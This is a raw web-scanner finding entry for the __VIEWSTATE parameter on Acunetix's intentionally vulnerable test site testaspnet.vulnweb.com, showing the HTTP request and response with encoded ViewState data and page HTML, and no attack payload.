href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ReadNews.aspx?id=2
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 422 bytes.	POST http://testaspnet.vulnweb.com/ReadNews.aspx?id=2 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?id=2 Content-Length: 10969 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 10,969 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WAh8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT9kAgcPFgIfAQWbODxwPjxzdHJvbmc%2BQWN1bmV0aXggY29tYmF0cyByaXNlIGluIHdlYiBhdHRhY2tzIHdpdGggQWN1bmV0aXggICAgICAgICAgICAgICAgICAgICAgICAgICAgV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAyIDwvc3Ryb25nPjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD4yMSBKdWx5IDIwMDUgLSA8c3Ryb25nPlN0YXJ0LXVwIGNvbXBhbnkgQWN1bmV0aXggcmVsZWFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjogYSB0b29sIHRvIGF1dG9tYXRpY2FsbHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXVkaXQgd2Vic2l0ZSBzZWN1cml0eS4gQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAgICAgICAgICAgICAgICAgICAgICAgICAgICAyIGNyYXdscyBhbiBlbnRpcmUgd2Vic2l0ZSwgbGF1bmNoZXMgcG9wdWxhciB3ZWIgYXR0YWNrcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAoU1FMIEluamVjdGlvbiBldGMuKSBhbmQgaWRlbnRpZmllcyB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBuZWVkIHRvIGJlIGZpeGVkLjwvc3Ryb25nPiA8L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5TZWN1cmluZyB5b3VyIHdlYnNpdGUgc2hvdWxkIGJlIHlvdXIgbnVtYmVyIG9uZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjb25jZXJuPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFja2VycyBhcmUgY29uY2VudHJhdGluZyB0aGVpciBlZmZvcnRzIG9uIHdlYi1iYXNlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcHBsaWNhdGlvbnMgLSA3NSUgb2YgY3liZXIgYXR0YWNrcyBhcmUgZG9uZSBhdCB0aGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGxldmVsLCBhIEdhcnRuZXIgR3JvdXAgc3R1ZHkgaGFzIHJldmVhbGVkLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBXZWIgYXBwbGljYXRpb25zIGFyZSBhY2Nlc3NpYmxlIDI0IGhvdXJzIGEgZGF5LCA3IGRheXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgYSB3ZWVrIGFuZCBjb250cm9sIHZhbHVhYmxlIGRhdGEgc3VjaCBhcyBjdXN0b21lciBpbmZvcm1hdGlvbiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHJhbnNhY3Rpb24gaW5mb3JtYXRpb24gYW5kIGV2ZW4gcHJvcHJpZXRhcnkgY29ycG9yYXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGEuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc%2BNTAwLDAwMCBjdXN0b21lciBjcmVkaXQgY2FyZCBudW1iZXJzIG9idGFpbmVkIHZpYSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhIHdlYiBhdHRhY2s8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBXZWxsLWtub3duIHNpdGVzIHRoYXQgd2VyZSBvcGVuIHRvIHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgZmFzaGlvbiBsYWJlbCBHdWVzcyBhbmQgcGV0IHN1cHBseSByZXRhaWxlciAgICAgICAgICAgICAgICAgICAgICAgICAgICBQZXRDby5jb20gd2hvIHdlcmUgbm90b3Jpb3VzbHkgZm91bmQgdG8gYmUgdnVsbmVyYWJsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB0byB0aGUgU1FMIGluamVjdGlvbiB2dWxuZXJhYmlsaXR5IChKdW5lIDIwMDMpLiBUaGlzICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJlc3VsdGVkIGluIFBldENvIGxlYXZpbmcgYXMgbWFueSBhcyA1MDAsMDAwIGNyZWRpdCAgICAgICAgICAgICAgICAgICAgICAgICAgICBjYXJkIG51bWJlcnMgb3BlbiB0byBhbnlvbmUgYWJsZSB0byBjb25zdHJ1Y3QgdGhpcyBzcGVjaWFsbHktY3JhZnRlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBVUkwuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc%2BRmlyZXdhbGxzLCBTU0wgYW5kIGxvY2tlZC1kb3duIHNlcnZlcnMgYXJlIGZ1dGlsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBoYWNraW5nPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQW55IGRlZmVuc2UgYXQgbmV0d29yayBzZWN1cml0eSBsZXZlbCB3aWxsIHByb3ZpZGUgbm8gICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJvdGVjdGlvbiBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzIHNpbmNlIHRoZXkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXJlIGxhdW5jaGVkIG9uIHBvcnQgODAgLSB3aGljaCBoYXMgdG8gcmVtYWluIG9wZW4uICAgICAgICAgICAgICAgICAgICAgICAgICAgIEluIGFkZGl0aW9uLCB3ZWIgYXBwbGljYXRpb25zIChjdXN0b21lciBhcmVhcywgc2hvcHBpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FydHMgZXRjLikgYXJlIG9mdGVuIHRhaWxvci1tYWRlLCBpbnZhcmlhYmx5IHRlc3RlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZXNzIHRoYW4gb2ZmLXRoZS1zaGVsZiBzb2Z0d2FyZSBhbmQgYXJlIHRoZXJlZm9yZSBtb3JlICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN1c2NlcHRpYmxlIHRvIGF0dGFjay48L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BJnF1b3Q7Q29tcGFuaWVzIGhhdmUgaW1wbGVtZW50ZWQgbmV0d29yay1sZXZlbCBzZWN1cml0eSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaG93ZXZlciB0aGV5IGZhaWwgdG8gYXVkaXQgYW5kIHNlY3VyZSB0aGVpciB3ZWIgYXBwbGljYXRpb25zLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBUaGVzZSBhcHBsaWNhdGlvbnMgaGF2ZSBhY2Nlc3MgdG8gc2Vuc2l0aXZlIGRhdGEgYW5kICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFyZSBhIGhhY2tlcidzIHByaW1lIHRhcmdldCwmcXVvdDsgc2FpZCBOaWNrIEdhbGVhLCAgICAgICAgICAgICAgICAgICAgICAgICAgICBDRU8gb2YgQWN1bmV0aXguICZxdW90O0F1ZGl0aW5nIG9uZSdzIHdlYiBhcHBzIHNob3VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBiZSB0aGUgbnVtYmVyIG9uZSBzZWN1cml0eSBjb25jZXJuLiZxdW90OzwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlRoZSBuZWVkIGZvciBhbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHZ1bG5lcmFiaWxpdHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2Nhbm5lcjwvc3Ryb25nPjxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIE1hbnVhbGx5IGF1ZGl0aW5nIGEgd2ViIGFwcGxpY2F0aW9uIGZvciB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdG8gU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdHRhY2tzIGlzIHZpcnR1YWxseSBpbXBvc3NpYmxlLiBXaXRoIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5ICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNjYW5uZXIgdGhlIHByb2Nlc3Mgb2YgYXVkaXRpbmcgd2ViIGFwcGxpY2F0aW9ucyBzdWNoICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFzIHNob3BwaW5nIGNhcnRzIGFuZCBmb3JtcywgY2FuIGJlIGVhc2lseSBhdXRvbWF0ZWQuICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdoYXQncyBtb3JlLCB0aGUgc2VjdXJpdHkgY2hlY2tzIGNhbiBlYXNpbHkgYmUgcmUtbGF1bmNoZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGVhY2ggYXBwbGljYXRpb24gdXBkYXRlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkhvdyBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIHdvcmtzPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGZpcnN0IGNyYXdscyB0aGUgd2hvbGUgd2Vic2l0ZSwgYW5hbHl6ZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW4tZGVwdGggZWFjaCBmaWxlIGl0IGZpbmRzLCBhbmQgZGlzcGxheXMgdGhlIGVudGlyZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB3ZWJzaXRlIHN0cnVjdHVyZS4gQWZ0ZXIgdGhpcyBkaXNjb3Zlcnkgc3RhZ2UsIGl0IHBlcmZvcm1zICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFuIGF1dG9tYXRpYyBhdWRpdCBmb3IgY29tbW9uIHNlY3VyaXR5IHZ1bG5lcmFiaWxpdGllcy48L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5BdXRvbWF0aWNhbGx5IGRldGVjdHMgU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiB2dWxuZXJhYmlsaXRpZXM8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBTUUwgaW5qZWN0aW9uIGlzIGEgaGFja2luZyB0ZWNobmlxdWUgd2hpY2ggbW9kaWZpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgU1FMIGNvbW1hbmRzIGluIG9yZGVyIHRvIGdhaW4gYWNjZXNzIHRvIGRhdGEgaW4gdGhlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGFiYXNlLiBDcm9zcyBzaXRlIHNjcmlwdGluZyBhdHRhY2tzIGFsbG93IGEgaGFja2VyICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRvIGV4ZWN1dGUgYSBtYWxpY2lvdXMgc2NyaXB0IG9uIHlvdXIgdmlzaXRvcnMnIGJyb3dzZXIuICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgY2FuIGNoZWNrIGlmIHlvdXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGlzIHZ1bG5lcmFibGUgdG8gYm90aCBvZiB0aGVzZSBhdHRhY2tzLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBNb3JlIGluZm9ybWF0aW9uIGFib3V0IGNyb3NzIHNpdGUgc2NyaXB0aW5nICZhbXA7IFNRTCAgICAgICAgICAgICAgICAgICAgICAgICAgICBpbmplY3Rpb24gYXQgb3VyIHdlYnNpdGUgc2VjdXJpdHkgaW5mbyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgYWxzbyBjaGVja3MgZm9yICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRoZSBmb2xsb3dpbmcgd2ViIGF0dGFja3M6PC9zdHJvbmc%2BPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDx1bD4gPGxpPkNSTEYgaW5qZWN0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5Db2RlIGV4ZWN1dGlvbiBhdHRhY2tzPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk%2BRGlyZWN0b3J5IHRyYXZlcnNhbCBhdHRhY2tzPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk%2BRmlsZSBpbmNsdXNpb24gYXR0YWNrczxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvbGk%2BPGxpPiBJbnB1dCB2YWxpZGF0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5BdXRoZW50aWNhdGlvbiBhdHRhY2tzLjwvbGk%2BIDwvdWw%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5BZHZhbmNlZCBwZW5ldHJhdGlvbiB0ZXN0aW5nIHRvb2xzPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGFsc28gaW5jbHVkZXMgdG9vbHMgc3VjaCBhcyBhbiBIVFRQIGVkaXRvciAgICAgICAgICAgICAgICAgICAgICAgICAgICAmYW1wOyBIVFRQIHNuaWZmZXIgdG8gYWxsb3cgY3VzdG9taXphdGlvbiBvZiB3ZWIgdnVsbmVyYWJpbGl0eSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjaGVja3MuIFVzaW5nIHRoZSBWdWxuZXJhYmlsaXR5IGVkaXRvciwgbmV3IGF0dGFja3MgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FuIGVhc2lseSBiZSBjcmVhdGVkLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlByaWNpbmcgJmFtcDsgYXZhaWxhYmlsaXR5PC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGlzIGF2YWlsYWJsZSBhcyBhbiBlbnRlcnByaXNlIG9yIGFzIGEgY29uc3VsdGFudCAgICAgICAgICAgICAgICAgICAgICAgICAgICB2ZXJzaW9uLiBBIHN1YnNjcmlwdGlvbiBiYXNlZCBsaWNlbnNlIGNhbiBiZSBwdXJjaGFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGFzIGxpdHRsZSBhcyAkMzk1LCB3aGVyZWFzIGEgcGVycGV0dWFsIGxpY2Vuc2Ugc3RhcnRzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGF0ICQyOTk1LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiB2aXNpdCBvdXIgcHJpY2luZyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc%2BPC9wPiAgICAgPHA%2BVXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD5kAgkPDxYEHgRUZXh0BRJSZWFkIHVzZXIgY29tbWVudHMeC05hdmlnYXRlVXJsBRJDb21tZW50cy5hc3B4P2lkPTJkZAILDxYCHgNzcmNkZGQMFEFD4s6E4%2BL8NgEI5fU11kxKVg%3D%3D&__VIEWSTATEGENERATOR=532053C5&__EVENTVALIDATION=%2FwEWVwKsmpfVDAL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBMM7CCcDz0WSHUDA7sLxpWzaC0J1
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:18 GMT Content-Length: 30581
Response Body - size: 30,581 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?id=2" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WAh8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT9kAgcPFgIfAQWbODxwPjxzdHJvbmc+QWN1bmV0aXggY29tYmF0cyByaXNlIGluIHdlYiBhdHRhY2tzIHdpdGggQWN1bmV0aXggICAgICAgICAgICAgICAgICAgICAgICAgICAgV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAyIDwvc3Ryb25nPjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD4yMSBKdWx5IDIwMDUgLSA8c3Ryb25nPlN0YXJ0LXVwIGNvbXBhbnkgQWN1bmV0aXggcmVsZWFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjogYSB0b29sIHRvIGF1dG9tYXRpY2FsbHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXVkaXQgd2Vic2l0ZSBzZWN1cml0eS4gQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAgICAgICAgICAgICAgICAgICAgICAgICAgICAyIGNyYXdscyBhbiBlbnRpcmUgd2Vic2l0ZSwgbGF1bmNoZXMgcG9wdWxhciB3ZWIgYXR0YWNrcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAoU1FMIEluamVjdGlvbiBldGMuKSBhbmQgaWRlbnRpZmllcyB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBuZWVkIHRvIGJlIGZpeGVkLjwvc3Ryb25nPiA8L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5TZWN1cmluZyB5b3VyIHdlYnNpdGUgc2hvdWxkIGJlIHlvdXIgbnVtYmVyIG9uZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjb25jZXJuPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFja2VycyBhcmUgY29uY2VudHJhdGluZyB0aGVpciBlZmZvcnRzIG9uIHdlYi1iYXNlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcHBsaWNhdGlvbnMgLSA3NSUgb2YgY3liZXIgYXR0YWNrcyBhcmUgZG9uZSBhdCB0aGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGxldmVsLCBhIEdhcnRuZXIgR3JvdXAgc3R1ZHkgaGFzIHJldmVhbGVkLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBXZWIgYXBwbGljYXRpb25zIGFyZSBhY2Nlc3NpYmxlIDI0IGhvdXJzIGEgZGF5LCA3IGRheXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgYSB3ZWVrIGFuZCBjb250cm9sIHZhbHVhYmxlIGRhdGEgc3VjaCBhcyBjdXN0b2